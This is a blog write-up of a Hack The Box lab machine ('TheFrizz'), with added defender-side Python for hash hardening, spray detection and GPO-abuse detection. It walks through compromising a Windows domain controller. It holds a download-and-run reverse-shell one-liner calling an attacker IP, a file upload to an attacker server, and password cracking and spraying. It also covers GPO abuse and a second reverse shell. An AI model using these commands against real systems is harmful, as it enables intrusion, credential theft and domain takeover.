HTB-TheFrizz

Information gathering:

rustscan -a 10.10.11.60 --range 1-65535 -- -sV
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.11.60:22
Open 10.10.11.60:53
Open 10.10.11.60:80
Open 10.10.11.60:88
Open 10.10.11.60:135
Open 10.10.11.60:139
Open 10.10.11.60:389
Open 10.10.11.60:445
Open 10.10.11.60:464
Open 10.10.11.60:593
Open 10.10.11.60:636
Open 10.10.11.60:3268
Open 10.10.11.60:3269
Open 10.10.11.60:9389
Open 10.10.11.60:49664
Open 10.10.11.60:49668
Open 10.10.11.60:49670
Open 10.10.11.60:56427
Open 10.10.11.60:56418
Open 10.10.11.60:56414
[~] Starting Nmap
[>] The Nmap command to be run is nmap -sV -vvv -p 22,53,80,88,135,139,389,445,464,593,636,3268,3269,9389,49664,49668,49670,56427,56418,56414 10.10.11.60

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-12 04:01 UTC
NSE: Loaded 46 scripts for scanning.
Initiating Ping Scan at 04:01
Scanning 10.10.11.60 [4 ports]
Completed Ping Scan at 04:01, 1.78s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 04:01
Scanning frizzdc.frizz.htb (10.10.11.60) [20 ports]
Discovered open port 53/tcp on 10.10.11.60
Discovered open port 139/tcp on 10.10.11.60
Discovered open port 22/tcp on 10.10.11.60
Discovered open port 56427/tcp on 10.10.11.60
Discovered open port 445/tcp on 10.10.11.60
Discovered open port 80/tcp on 10.10.11.60
Discovered open port 135/tcp on 10.10.11.60
Discovered open port 389/tcp on 10.10.11.60
Discovered open port 593/tcp on 10.10.11.60
Discovered open port 636/tcp on 10.10.11.60
Discovered open port 56414/tcp on 10.10.11.60
Discovered open port 49670/tcp on 10.10.11.60
Discovered open port 464/tcp on 10.10.11.60
Discovered open port 49668/tcp on 10.10.11.60
Discovered open port 9389/tcp on 10.10.11.60
Discovered open port 3269/tcp on 10.10.11.60
Discovered open port 56418/tcp on 10.10.11.60
Discovered open port 3268/tcp on 10.10.11.60
Discovered open port 49664/tcp on 10.10.11.60
Discovered open port 88/tcp on 10.10.11.60
Completed SYN Stealth Scan at 04:01, 0.61s elapsed (20 total ports)
Initiating Service scan at 04:01
Scanning 20 services on frizzdc.frizz.htb (10.10.11.60)
Completed Service scan at 04:02, 57.89s elapsed (20 services on 1 host)
NSE: Script scanning 10.10.11.60.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 04:02
Completed NSE at 04:02, 1.21s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 04:02
Completed NSE at 04:02, 1.08s elapsed
Nmap scan report for frizzdc.frizz.htb (10.10.11.60)
Host is up, received echo-reply ttl 127 (0.42s latency).
Scanned at 2025-04-12 04:01:39 UTC for 61s

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 127 OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-12 10:42:29Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
56414/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
56418/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
56427/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.41 seconds
Raw packets sent: 24 (1.032KB) | Rcvd: 21 (908B)

This is a Gibbon installation (Gibbon is a school platform created by teachers, aimed at solving the practical problems educators run into every day). The version is 25.0.00.

CVE-2023-45878

A matching exploit was found in the Alibaba Cloud vulnerability database; the key point is that it requires no authentication.

Capture a request and exploit it.

Get a reverse shell.

Use one of the PowerShell scripts from nishang.

powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.9:8081/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 1234

Cracking the password with john

Under C:\xampp\htdocs\Gibbon-LMS there is a config.php that holds the database account and password.

<?php
/*
Gibbon, Flexible & Open School System
Copyright (C) 2010, Ross Parker

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/

/**
* Sets the database connection information.
* You can supply an optional $databasePort if your server requires one.
*/
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';

/**
* Sets a globally unique id, to allow multiple installs on a single server.
*/
$guid = '7y59n5xz-uym-ei9p-7mmq-83vifmtyey2';

/**
* Sets system-wide caching factor, used to balance performance and freshness.
* Value represents number of page loads between cache refresh.
* Must be positive integer. 1 means no caching.
*/
$caching = 10;

mysql.exe is in the C:\xampp\mysql\bin directory.

.\mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -e "show databases;"
.\mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -e "show databases;use gibbon;show tables;"
.\mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -e "show databases;use gibbon;select * from gibbonperson;" -E  # -E prints each row in vertical format

Note that there must be no space between -p and the password. The -e option is added to execute the statement; without it, the preceding command returns no output.

gender: Unspecified
username: f.frizzle
passwordStrong: 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03
passwordStrongSalt: /aACFhikmNopqrRTVz2489

Crack it with john; it is a SHA-256 hash.

Create hash.txt:

f.frizzle:$dynamic_82$067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03$/aACFhikmNopqrRTVz2489

Then:

john --format=dynamic='sha256($s.$p)' --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Jenni_Luvs_Magic23
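As an added example (not code from the original writeup or from Gibbon), the following Python implements the salt-then-password SHA-256 scheme that the john format string above, sha256($s.$p), describes, parses the hash.txt line format used above, and contrasts it with a deliberately slow KDF. The hash and salt in PAGE_LINE come from the gibbonperson row shown above; the demo salt and password in the self-check are constructed, and the PBKDF2 iteration count is an assumption chosen as a reasonable current baseline.

```python
import hashlib
import hmac

# Line in the format fed to john above (hash and salt from the gibbonperson row).
PAGE_LINE = ("f.frizzle:$dynamic_82$"
             "067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03"
             "$/aACFhikmNopqrRTVz2489")


def gibbon_hash(salt: str, password: str) -> str:
    """A single SHA-256 over salt || password, hex encoded (the sha256($s.$p) scheme)."""
    return hashlib.sha256((salt + password).encode("utf-8")).hexdigest()


def parse_dynamic_82(line: str):
    """Split 'user:$dynamic_82$<hex hash>$<salt>' into (user, hash, salt)."""
    user, rest = line.split(":", 1)
    _, tag, digest, salt = rest.split("$", 3)   # maxsplit keeps any '$' inside the salt
    if tag != "dynamic_82":
        raise ValueError(f"unexpected format tag {tag!r}")
    return user, digest.lower(), salt


def verify_candidate(line: str, candidate: str) -> bool:
    """Check one candidate password against a stored hash line (constant-time compare)."""
    _, digest, salt = parse_dynamic_82(line)
    return hmac.compare_digest(gibbon_hash(salt, candidate), digest)


# Mitigation side: a standard, deliberately slow KDF. Each verification costs
# PBKDF2_ITERATIONS HMAC rounds instead of one SHA-256, so a wordlist run of the
# kind shown above takes several hundred thousand times more work per guess.
PBKDF2_ITERATIONS = 600_000   # assumption: chosen as a reasonable current baseline


def slow_hash(salt: str, password: str) -> str:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                               salt.encode("utf-8"), PBKDF2_ITERATIONS).hex()


def verify_slow(salt: str, stored: str, candidate: str) -> bool:
    return hmac.compare_digest(slow_hash(salt, candidate), stored)


if __name__ == "__main__":
    # Constructed credentials for a self-check; this salt is not one from the page.
    salt, pw = "demoSalt1234", "correct horse battery staple"
    line = f"demo:$dynamic_82${gibbon_hash(salt, pw)}${salt}"
    print(parse_dynamic_82(PAGE_LINE))
    print(verify_candidate(line, pw), verify_candidate(line, "wrong"))
    print(verify_slow(salt, slow_hash(salt, pw), pw))
```

The point for a defender is the ratio: a fast unsalted-cost hash such as sha256(salt.password) lets a wordlist like rockyou be tried at hardware speed, whereas the same salt stored under PBKDF2 (or scrypt/argon2) makes every guess pay the full iteration count.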

Creating a ticket

Verify the credentials with kerbrute.

kerbrute bruteuser --dc 10.10.11.60 -d frizz.htb pass.txt f.frizzle 

Logging in directly with the username and password does not work here; a Kerberos ticket is required.

faketime "$(ntpdate -q frizz.htb | awk '{print $1" "$2}')" zsh  # shift the local clock to match the DC
ntpdate frizzdc.frizz.htb  # sync the time
impacket-getTGT frizz.htb/'f.frizzle':'Jenni_Luvs_Magic23' -dc-ip frizzdc.frizz.htb  # request a TGT
export KRB5CCNAME=f.frizzle.ccache  # load the ticket
# port 22 is open (see the scan above), so SSH with the generated ticket can log in to the target host
ssh f.frizzle@10.10.11.60 -K

Note that for SSH to succeed you need to create /etc/krb5.conf.

[libdefaults]
default_realm = FRIZZ.HTB
dns_lookup_realm = false
dns_lookup_kdc = true

[realms]
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
admin_server = frizzdc.frizz.htb
}

[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTB

user.txt is found on the Desktop.

There are other accounts as well.

Privilege escalation via GPO abuse

Run a BloodHound analysis.

bloodhound-python -u 'f.frizzle' -p 'Jenni_Luvs_Magic23' -d frizz.htb -dc frizzdc.frizz.htb -ns 10.10.11.60 -c all --zip

Use PowerShell to check the Recycle Bin for deleted files:

$shell = New-Object -ComObject Shell.Application
$recycleBin = $shell.Namespace(0xA)
$recycleBin.items() | Select-Object Name, Path

Download it.

First run a Flask service on Kali to receive the file:

from flask import Flask, request
import os

app = Flask(__name__)


@app.route('/upload', methods=['POST'])
def upload_file():
    # Receive the multipart field named "file" and save it under its own name
    # in the working directory; basename() keeps a client-supplied path from
    # escaping that directory.
    file = request.files['file']
    file.save(os.path.basename(file.filename))
    return 'OK'


app.run(host='0.0.0.0', port=8000)

Then run the PowerShell script on Windows:

# single quotes: in a double-quoted string PowerShell would expand $RECYCLE and $RE2XMEG as variables
$FilePath = 'C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7z'
$Url = 'http://10.10.14.80:8000/upload'

$wc = New-Object System.Net.WebClient
$wc.UploadFile($Url, "POST", $FilePath)

Downloaded successfully.

7z x '$RE2XMEG.7z'  # extract it

Base64 decode:

!suBcig@MehTed!R

It is a password, but whose is unknown.

Password spray:

kerbrute passwordspray -d frizz.htb --dc 10.10.11.60 user.txt '!suBcig@MehTed!R'
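As an added defender-side example (not part of the original writeup), the following Python flags the trace a spray like the one above leaves on the domain controller: many distinct accounts failing Kerberos pre-authentication from one source address within a short window, followed by a successful TGT request from that same address. The records are constructed to mirror Security log events 4771 and 4768; the field names, the timestamps, and the account names other than M.SchoolBus are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Security-log records from a domain controller (sample data, not real logs).
# 4771 = Kerberos pre-authentication failed (status 0x18 = wrong password);
# 4768 = TGT requested (status 0x0 = success). Account names other than
# M.SchoolBus and the timestamps are assumptions for the example.
SAMPLE_EVENTS = [
    {"time": "2025-04-15 19:17:01", "id": 4771, "user": "alice", "ip": "10.10.14.80", "status": "0x18"},
    {"time": "2025-04-15 19:17:01", "id": 4771, "user": "bob",   "ip": "10.10.14.80", "status": "0x18"},
    {"time": "2025-04-15 19:17:02", "id": 4771, "user": "carol", "ip": "10.10.14.80", "status": "0x18"},
    {"time": "2025-04-15 19:17:02", "id": 4771, "user": "dave",  "ip": "10.10.14.80", "status": "0x18"},
    {"time": "2025-04-15 19:17:03", "id": 4771, "user": "erin",  "ip": "10.10.14.80", "status": "0x18"},
    {"time": "2025-04-15 19:17:03", "id": 4768, "user": "M.SchoolBus", "ip": "10.10.14.80", "status": "0x0"},
    # one account failing repeatedly from another host: noisy, but not a spray
    {"time": "2025-04-15 19:20:10", "id": 4771, "user": "frank", "ip": "10.10.14.9", "status": "0x18"},
    {"time": "2025-04-15 19:20:11", "id": 4771, "user": "frank", "ip": "10.10.14.9", "status": "0x18"},
    {"time": "2025-04-15 19:20:12", "id": 4771, "user": "frank", "ip": "10.10.14.9", "status": "0x18"},
]


def parse_time(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def detect_password_spray(events, window=timedelta(minutes=5), min_users=5):
    """Map source IP -> sorted account list for sources whose bad-password
    pre-auth failures hit at least min_users distinct accounts within window."""
    failures = defaultdict(list)
    for e in events:
        if e["id"] == 4771 and e["status"] == "0x18":
            failures[e["ip"]].append((parse_time(e["time"]), e["user"]))
    hits = {}
    for ip, items in failures.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            # distinct accounts failing within `window` of this failure
            users = {u for t, u in items[i:] if t - start <= window}
            if len(users) >= min_users:
                hits[ip] = sorted(users)
                break
    return hits


def successful_tgts_from(events, ip):
    """Accounts that obtained a TGT from a flagged source: the spray found a valid password."""
    return sorted({e["user"] for e in events
                   if e["id"] == 4768 and e["ip"] == ip and e["status"] == "0x0"})


if __name__ == "__main__":
    for ip, users in detect_password_spray(SAMPLE_EVENTS).items():
        print(f"spray from {ip}: {len(users)} accounts; "
              f"succeeded as {successful_tgts_from(SAMPLE_EVENTS, ip)}")
```

The per-account lockout counter never trips on a spray (one attempt per user), which is why the rule keys on the source address and counts distinct accounts rather than attempts; the 4768 correlation is what separates a failed spray from one that just handed out a valid ticket.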

Same approach as above: request a ticket and log in via SSH.

impacket-getTGT frizz.htb/'M.SchoolBus':'!suBcig@MehTed!R' -dc-ip frizzdc.frizz.htb
export KRB5CCNAME=M.SchoolBus.ccache

Again collect information with bloodhound-python:

Mind the Kerberos clock skew.

faketime "$(ntpdate -q frizz.htb | awk '{print $1" "$2}')" zsh
bloodhound-python -u 'M.SchoolBus' -p '!suBcig@MehTed!R' -d frizz.htb -dc frizzdc.frizz.htb -ns 10.10.11.60 -c all --zip

M.SchoolBus belongs to the DESKTOP ADMINS group, which carries somewhat higher privileges.

M.SchoolBus also belongs to GROUP POLICY CREATOR OWNERS (the GPCO group).

According to the writeup this calls for a GPO abuse attack.

Create a new GPO and link it into the domain, use SharpGPOAbuse.exe to add a policy entry that puts M.SchoolBus in the administrators group, and finally refresh group policy so that the policy applies.

# create the malicious GPO
New-GPO -Name "hacker"
# link the GPO to the domain controllers
New-GPLink -Name "hacker" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
# add M.SchoolBus to the domain admins group
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName hacker
# refresh the GPO
gpupdate /force
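As an added detection example (not from the original writeup or from SharpGPOAbuse), the following Python walks Directory Service Changes audit records for the three steps just performed: a groupPolicyContainer object created by an account outside an expected-author list, a gPLink modification on a tier-0 OU such as Domain Controllers, and a change to gPCMachineExtensionNames on that freshly created GPO. The records are constructed to mirror Security events 5137 (object created) and 5136 (object modified); the GPO GUID, the helpdesk account, the CSE placeholder value and the expected-author list are assumptions.

```python
import re

# Constructed Directory Service Changes audit records (sample data, not real logs):
# 5137 = directory object created, 5136 = directory object modified. The GPO GUID,
# the helpdesk account and the CSE placeholder are assumptions for the example.
GPO_GUID = "{0f0f0f0f-0000-4000-8000-000000000001}"
SAMPLE_EVENTS = [
    {"id": 5137, "subject": "M.SchoolBus", "class": "groupPolicyContainer",
     "dn": f"CN={GPO_GUID},CN=Policies,CN=System,DC=frizz,DC=htb",
     "attr": None, "value": None},
    {"id": 5136, "subject": "M.SchoolBus", "class": "organizationalUnit",
     "dn": "OU=Domain Controllers,DC=frizz,DC=htb", "attr": "gPLink",
     "value": f"[LDAP://cn={GPO_GUID.upper()},cn=policies,cn=system,DC=frizz,DC=htb;0]"},
    {"id": 5136, "subject": "M.SchoolBus", "class": "groupPolicyContainer",
     "dn": f"CN={GPO_GUID},CN=Policies,CN=System,DC=frizz,DC=htb",
     "attr": "gPCMachineExtensionNames", "value": "[{CSE-GUID-PLACEHOLDER}{...}]"},
    # a routine change that must not alert
    {"id": 5136, "subject": "helpdesk01", "class": "user",
     "dn": "CN=alice,CN=Users,DC=frizz,DC=htb", "attr": "description", "value": "desk move"},
]

# OUs whose linked policies reach tier-0 machines; compared case-insensitively.
TIER0_OUS = {"ou=domain controllers,dc=frizz,dc=htb"}
# Assumption: accounts that are expected to author GPOs in this environment.
EXPECTED_GPO_AUTHORS = {"administrator"}
GUID_RE = re.compile(r"\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}", re.I)


def gpo_guid(s):
    """Pull the {GUID} out of a GPC distinguished name or a gPLink value."""
    m = GUID_RE.search(s or "")
    return m.group(0).lower() if m else None


def detect_gpo_abuse(events, tier0_ous=TIER0_OUS, expected_authors=EXPECTED_GPO_AUTHORS):
    """Return (rule, subject, gpo_guid) alerts, one per suspicious step."""
    alerts, created = [], {}
    for e in events:
        subject = e["subject"]
        if e["id"] == 5137 and e["class"] == "groupPolicyContainer":
            guid = gpo_guid(e["dn"])
            created[guid] = subject
            if subject.lower() not in expected_authors:
                alerts.append(("gpo_created_by_unexpected_account", subject, guid))
        elif e["id"] == 5136 and e["attr"] == "gPLink" and e["dn"].lower() in tier0_ous:
            alerts.append(("gplink_changed_on_tier0_ou", subject, gpo_guid(e["value"])))
        elif e["id"] == 5136 and e["attr"] == "gPCMachineExtensionNames":
            guid = gpo_guid(e["dn"])
            if guid in created:   # only GPOs seen created in this batch
                alerts.append(("machine_extensions_set_on_new_gpo", subject, guid))
    return alerts


if __name__ == "__main__":
    for rule, who, guid in detect_gpo_abuse(SAMPLE_EVENTS):
        print(f"{rule}: {who} -> {guid}")
```

These events only exist if the Audit Directory Service Changes subcategory is enabled and the Policies container and the OUs carry a SACL for write operations; without that, the gPLink edit on Domain Controllers, which is the step that turns a GPCO member's new policy into a tier-0 change, leaves no record to match.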

It can be seen that the user has been added to the administrators group.

Then use RunasCs to start another process:

https://github.com/antonioCoco/RunasCs

.\Runas.exe M.SchoolBus !suBcig@MehTed!R cmd.exe -r 10.10.14.80:8888
# listen on port 8888 on Kali

http://example.com/2025/04/12/HTB-TheFrizz/
Author: FSRM
Published: 12 April 2025
Updated: 15 April 2025